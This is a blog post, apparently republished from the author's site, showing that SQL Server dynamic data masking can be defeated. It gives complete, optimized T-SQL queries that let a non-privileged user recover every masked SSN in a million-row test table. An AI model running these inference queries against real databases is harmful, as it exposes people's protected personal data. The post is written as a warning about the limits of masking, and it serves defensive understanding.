Tuesday, September 15, 2020

Dynamic Data Unmasking

Dynamic data masking is a SQL Server 2016 feature to mask sensitive data at the column level from non-privileged users. Hiding SSNs is a common example in the documentation. However, the documentation also gives the following warning:

The purpose of dynamic data masking is to limit exposure of sensitive data, preventing users who should not have access to the data from viewing it. Dynamic data masking does not aim to prevent database users from connecting directly to the database and running exhaustive queries that expose pieces of the sensitive data.

How bad can it be? This post explores how quickly a table of SSNs can be unmasked by a non-privileged user.

Simple Demo

Let’s use a table structure very similar to the example in the documentation:

DROP TABLE IF EXISTS dbo.People;
CREATE TABLE dbo.People
(
PersonID BIGINT PRIMARY KEY,
FirstName VARCHAR(100) NOT NULL,
LastName VARCHAR(100) NOT NULL,
SSN VARCHAR(11) MASKED WITH (FUNCTION = 'default()') NULL
);
INSERT INTO dbo.People
VALUES
(1, 'Pablo', 'Blanco', '123-45-6789');

Here’s what the data looks like for a privileged user, such as a user with sa:

a12_sa_results

However, if I login with my lowly erik SQL Server login I can no longer see Pablo Blanco’s SSN:

a12_erik_results

Test Data

To make things more interesting let’s load a million rows into the table. SSNs will be randomized but I didn’t bother randomizing the first and last names.

DROP TABLE IF EXISTS dbo.People;
CREATE TABLE dbo.People
(
PersonID BIGINT PRIMARY KEY,
FirstName VARCHAR(100) NOT NULL,
LastName VARCHAR(100) NOT NULL,
SSN VARCHAR(11) MASKED WITH (FUNCTION = 'default()') NULL
);
INSERT INTO dbo.People WITH (TABLOCK)
SELECT TOP (1000000)
ROW_NUMBER() OVER (ORDER BY (SELECT NULL)),
REPLICATE('A', 10),
REPLICATE('Z', 12),
RIGHT('000' + CAST(ABS(CHECKSUM(NEWID())) AS VARCHAR(11)), 3) + '-'
+ RIGHT('00' + CAST(ABS(CHECKSUM(NEWID())) AS VARCHAR(11)), 2) + '-'
+ RIGHT('0000' + CAST(ABS(CHECKSUM(NEWID())) AS VARCHAR(11)), 4)
FROM master..spt_values AS t1
CROSS JOIN master..spt_values AS t2;

How quickly can the malicious end user erik decode all of the data? Does he really require a set of exhaustive queries? To make things somewhat realistic, setting trace flags and creating objects is off limits. Only temp tables can be created, since all users can do that.

Decoding the SSN Format

The WHERE clause of queries can be used to infer information about the data. For example, the following query is protected by data masking because all of the action is in the SELECT clause:

SELECT PersonId,
FirstName,
LastName,
CASE LEFT(SSN, 1)
WHEN '0' THEN
'0'
WHEN '1' THEN
'1'
WHEN '2' THEN
'2'
WHEN '3' THEN
'3'
WHEN '4' THEN
'4'
WHEN '5' THEN
'5'
WHEN '6' THEN
'6'
WHEN '7' THEN
'7'
WHEN '8' THEN
'8'
WHEN '9' THEN
'9'
ELSE
NULL
END AS D1
FROM dbo.People;

However, the following query will only return the subset of rows with 1 as the first digit in their SSNs:

SELECT PersonId,
FirstName,
LastName
FROM dbo.People
WHERE LEFT(SSN, 1) = 1;

With 90 queries we could get all of the information that we need, but that’s too much work. First we need to verify the format of the SSN in the column. Perhaps it has dashes and perhaps it doesn’t. Let’s say that our malicious end user gets lucky and both of the following queries return a count of one million rows:

SELECT COUNT(*)
FROM dbo.People
WHERE LEN(SSN) = 11;
SELECT COUNT(*)
FROM dbo.People
WHERE LEN(REPLACE(SSN, '-', '')) = 9;

It’s a reasonable assumption that the SSN is in a XXX-XX-XXXX format, even though the data mask doesn’t tell us that directly.

Looping to Victory

Armed with our new knowledge, we can create a single SQL query that decodes all of the SSNs. The strategy is to define a single CTE with all ten digits and to use one CROSS APPLY for each digit in the SSN. Each CROSS APPLY only references the SSN column in the WHERE clause and returns the matching prefix of the SSN that we’ve found so far. Here’s a snippet of the code:

SELECT p.PersonID,
d9.real_ssn
FROM dbo.People AS p
CROSS APPLY
(
SELECT TOP 1
d0.DIGIT
FROM DIGITS AS d0
WHERE p.SSN LIKE d0.DIGIT + '%'
) AS d1(prefix)
CROSS APPLY
(
SELECT TOP 1
d1.prefix + d0.DIGIT
FROM DIGITS AS d0
WHERE p.SSN LIKE d1.prefix + d0.DIGIT + '%'
) AS d2(prefix);

In the d1 derived table the first digit is found. That digit is passed to the d2 derived table and the first two digits are returned from d2. This continues all the way to d9 which has the full SSN. The full query is below:

DROP TABLE IF EXISTS #t;
WITH DIGITS (DIGIT)
AS (SELECT *
FROM
(
VALUES
('0'),
('1'),
('2'),
('3'),
('4'),
('5'),
('6'),
('7'),
('8'),
('9')
) AS v (x) )
SELECT p.PersonID,
p.FirstName,
p.LastName,
d9.real_ssn
INTO #t
FROM dbo.People AS p
CROSS APPLY
(
SELECT TOP 1
d0.DIGIT
FROM DIGITS AS d0
WHERE p.SSN LIKE d0.DIGIT + '%'
) AS d1(prefix)
CROSS APPLY
(
SELECT TOP 1
d1.prefix + d0.DIGIT
FROM DIGITS AS d0
WHERE p.SSN LIKE d1.prefix + d0.DIGIT + '%'
) AS d2(prefix)
CROSS APPLY
(
SELECT TOP 1
d2.prefix + d0.DIGIT + '-'
FROM DIGITS AS d0
WHERE p.SSN LIKE d2.prefix + d0.DIGIT + '%'
) AS d3(prefix)
CROSS APPLY
(
SELECT TOP 1
d3.prefix + d0.DIGIT
FROM DIGITS AS d0
WHERE p.SSN LIKE d3.prefix + d0.DIGIT + '%'
) AS d4(prefix)
CROSS APPLY
(
SELECT TOP 1
d4.prefix + d0.DIGIT + '-'
FROM DIGITS AS d0
WHERE p.SSN LIKE d4.prefix + d0.DIGIT + '%'
) AS d5(prefix)
CROSS APPLY
(
SELECT TOP 1
d5.prefix + d0.DIGIT
FROM DIGITS AS d0
WHERE p.SSN LIKE d5.prefix + d0.DIGIT + '%'
) AS d6(prefix)
CROSS APPLY
(
SELECT TOP 1
d6.prefix + d0.DIGIT
FROM DIGITS AS d0
WHERE p.SSN LIKE d6.prefix + d0.DIGIT + '%'
) AS d7(prefix)
CROSS APPLY
(
SELECT TOP 1
d7.prefix + d0.DIGIT
FROM DIGITS AS d0
WHERE p.SSN LIKE d7.prefix + d0.DIGIT + '%'
) AS d8(prefix)
CROSS APPLY
(
SELECT TOP 1
d8.prefix + d0.DIGIT
FROM DIGITS AS d0
WHERE p.SSN LIKE d8.prefix + d0.DIGIT + '%'
) AS d9(real_ssn);

On my machine, this query takes an average of 5952 ms to finish. Here’s a sample of the results:

a12_sample_results

Not bad to unmask one million SSNs.

Looping Even Faster to Victory

The LIKE operator is a bit heavy for what we’re doing. Another way to approach the problem is to have each derived table just focus on a single digit and to concatenate them all together at the end. I found SUBSTRING to be the fastest way to do this. The full query is below:

DROP TABLE IF EXISTS #t;
WITH DIGITS (DIGIT)
AS (SELECT *
FROM
(
VALUES
('0'),
('1'),
('2'),
('3'),
('4'),
('5'),
('6'),
('7'),
('8'),
('9')
) AS v (x) )
SELECT p.PersonID,
p.FirstName,
p.LastName,
d1.DIGIT + d2.DIGIT + d3.DIGIT + '-' + d4.DIGIT + d5.DIGIT + '-' 
     + d6.DIGIT + d7.DIGIT + d8.DIGIT + d9.DIGIT AS real_ssn
INTO #t
FROM dbo.People AS p
CROSS APPLY
(
SELECT TOP 1
d0.DIGIT
FROM DIGITS AS d0
WHERE SUBSTRING(p.SSN, 1, 1) = d0.DIGIT
) AS d1(DIGIT)
CROSS APPLY
(
SELECT TOP 1
d0.DIGIT
FROM DIGITS AS d0
WHERE SUBSTRING(p.SSN, 2, 1) = d0.DIGIT
) AS d2(DIGIT)
CROSS APPLY
(
SELECT TOP 1
d0.DIGIT
FROM DIGITS AS d0
WHERE SUBSTRING(p.SSN, 3, 1) = d0.DIGIT
) AS d3(DIGIT)
CROSS APPLY
(
SELECT TOP 1
d0.DIGIT
FROM DIGITS AS d0
WHERE SUBSTRING(p.SSN, 5, 1) = d0.DIGIT
) AS d4(DIGIT)
CROSS APPLY
(
SELECT TOP 1
d0.DIGIT
FROM DIGITS AS d0
WHERE SUBSTRING(p.SSN, 6, 1) = d0.DIGIT
) AS d5(DIGIT)
CROSS APPLY
(
SELECT TOP 1
d0.DIGIT
FROM DIGITS AS d0
WHERE SUBSTRING(p.SSN, 8, 1) = d0.DIGIT
) AS d6(DIGIT)
CROSS APPLY
(
SELECT TOP 1
d0.DIGIT
FROM DIGITS AS d0
WHERE SUBSTRING(p.SSN, 9, 1) = d0.DIGIT
) AS d7(DIGIT)
CROSS APPLY
(
SELECT TOP 1
d0.DIGIT
FROM DIGITS AS d0
WHERE SUBSTRING(p.SSN, 10, 1) = d0.DIGIT
) AS d8(DIGIT)
CROSS APPLY
(
SELECT TOP 1
d0.DIGIT
FROM DIGITS AS d0
WHERE SUBSTRING(p.SSN, 11, 1) = d0.DIGIT
) AS d9(DIGIT);

 

This query runs in an average on 1833 ms on my machine. The query plan looks as you might expect. Each cross apply is implemented as a parallel nested loop join against a constant scan of 10 values. On average each constant scan operator produces roughly 5.5 million rows. This makes sense, since for each loop we’ll need to check an average of 5.5 values before finding a match, assuming perfectly distributed random digits. Here’s a representative part of the plan:

a12_query1

Letting SQL Server do the Work

With nine digits we end up reading almost 50 million values from the constant scan operators. That’s a lot of work. Can we write a simpler query and let SQL Server do the work for us? We know that SSNs are always numeric, so if we had a table full of all billion possible SSNs then we could join to that and just keep the value from the table. Populating a temp table with a billion rows will take too long, but we can simply split up the SSN into its natural three parts and join to those tables. One way to do this is below:

SELECT TOP (100)
RIGHT('0' + CAST(t.RN AS VARCHAR(10)), 2) AS NUM
INTO #t_100
FROM
(
SELECT -1 + ROW_NUMBER() OVER (ORDER BY (SELECT NULL)) AS RN
FROM master..spt_values AS t1
CROSS JOIN master..spt_values AS t2
) AS t;
SELECT TOP (1000)
RIGHT('00' + CAST(t.RN AS VARCHAR(10)), 3) AS NUM
INTO #t_1000
FROM
(
SELECT -1 + ROW_NUMBER() OVER (ORDER BY (SELECT NULL)) AS RN
FROM master..spt_values AS t1
CROSS JOIN master..spt_values AS t2
) AS t;
SELECT TOP (10000)
RIGHT('000' + CAST(t.RN AS VARCHAR(10)), 4) AS NUM
INTO #t_10000
FROM
(
SELECT -1 + ROW_NUMBER() OVER (ORDER BY (SELECT NULL)) AS RN
FROM master..spt_values AS t1
CROSS JOIN master..spt_values AS t2
) AS t;
DROP TABLE IF EXISTS #t;
SELECT p.PersonID,
p.FirstName,
p.LastName,
CONCAT(t1000.NUM, '-', t100.NUM, '-', t10000.NUM) AS SSN
INTO #t
FROM dbo.People AS p
LEFT OUTER JOIN #t_1000 AS t1000
ON SUBSTRING(p.SSN, 1, 3) = t1000.NUM
LEFT OUTER JOIN #t_100 AS t100
ON SUBSTRING(p.SSN, 5, 2) = t100.NUM
LEFT OUTER JOIN #t_10000 AS t10000
ON SUBSTRING(p.SSN, 8, 4) = t10000.NUM;

The query now runs in an average of 822 ms. Note that I didn’t try very hard to optimize the inserts into the temp tables because they finish almost instantly. Taking a look at the plan, we see a lot of repartition stream operators because the column for the hash join is different for each query:

a12_repartition

Can we go faster?

Batch Mode to the Rescue

With parallel batch mode hash joins we don’t need to repartition the streams of the larger outer result set. I changed the query to only look at the table with 10000 rows to get more consistent and even parallel row distribution on the temp tables. I also added a clustered index on the temp table for the same reason. In addition to that, maybe we can expect joins to be faster with INT join columns as opposed to VARCHAR. With the canonical #BATCH_MODE_PLZ temp table to make the query eligible for batch mode, the query now looks like this:

SELECT TOP (100000)
ISNULL(CAST(t.RN AS INT), 0) AS NUM
INTO #t_10000
FROM
(
SELECT -1 + ROW_NUMBER() OVER (ORDER BY (SELECT NULL)) AS RN
FROM master..spt_values AS t1
CROSS JOIN master..spt_values AS t2
) AS t;
CREATE CLUSTERED INDEX CI ON #t_10000 (NUM);
CREATE TABLE #BATCH_MODE_PLZ
(
I INT,
INDEX C CLUSTERED COLUMNSTORE
);
DROP TABLE IF EXISTS #t;
SELECT p.PersonID,
p.FirstName,
p.LastName,
CONCAT(t1000.NUM, '-', t100.NUM, '-', t10000.NUM) AS SSN
INTO #t
FROM dbo.People AS p
LEFT OUTER JOIN #t_10000 AS t1000
ON CAST(SUBSTRING(p.SSN, 1, 3) AS INT) = t1000.NUM
LEFT OUTER JOIN #t_10000 AS t100
ON CAST(SUBSTRING(p.SSN, 5, 2) AS INT) = t100.NUM
LEFT OUTER JOIN #t_10000 AS t10000
ON CAST(SUBSTRING(p.SSN, 8, 4) AS INT) = t10000.NUM
LEFT OUTER JOIN #BATCH_MODE_PLZ
ON 1 = 0;

The query now runs in an average of 330 ms. The repartition stream operators are no longer present:

a12_no_repart

It wasn’t clear to me how to speed this query up further. The probe residuals in the hash joins are one target:

a12_probe

These appear because SQL Server cannot guarantee that hash collisions won’t occur. Paul White points out the following:

If the join is on a single column typed as TINYINT, SMALLINT or INTEGER and if both columns are constrained to be NOT NULL, the hash function is ‘perfect’ – meaning there is no chance of a hash collision, and the query processor does not have to check the values again to ensure they really match.

Unfortunately, the probe residual remains even with the right temp table definition and adding explicit casts and non-null guarantees to the SUBSTRING expression. Perhaps the type information is lost in the plan and cannot be taken advantage of.

Final Thoughts

I don’t think that there’s really anything new here. This was mostly done for fun. Decoding a million SSNs in half a second is a good trick and a good reminder to be very careful with expectations around how much security data masking really gives you. Thanks for reading!

Editor’s note: This article was originally published at erikdarlingdata.com.

The post Dynamic Data Unmasking appeared first on Simple Talk.



from Simple Talk https://ift.tt/3hrJPY4
via

No comments:

Post a Comment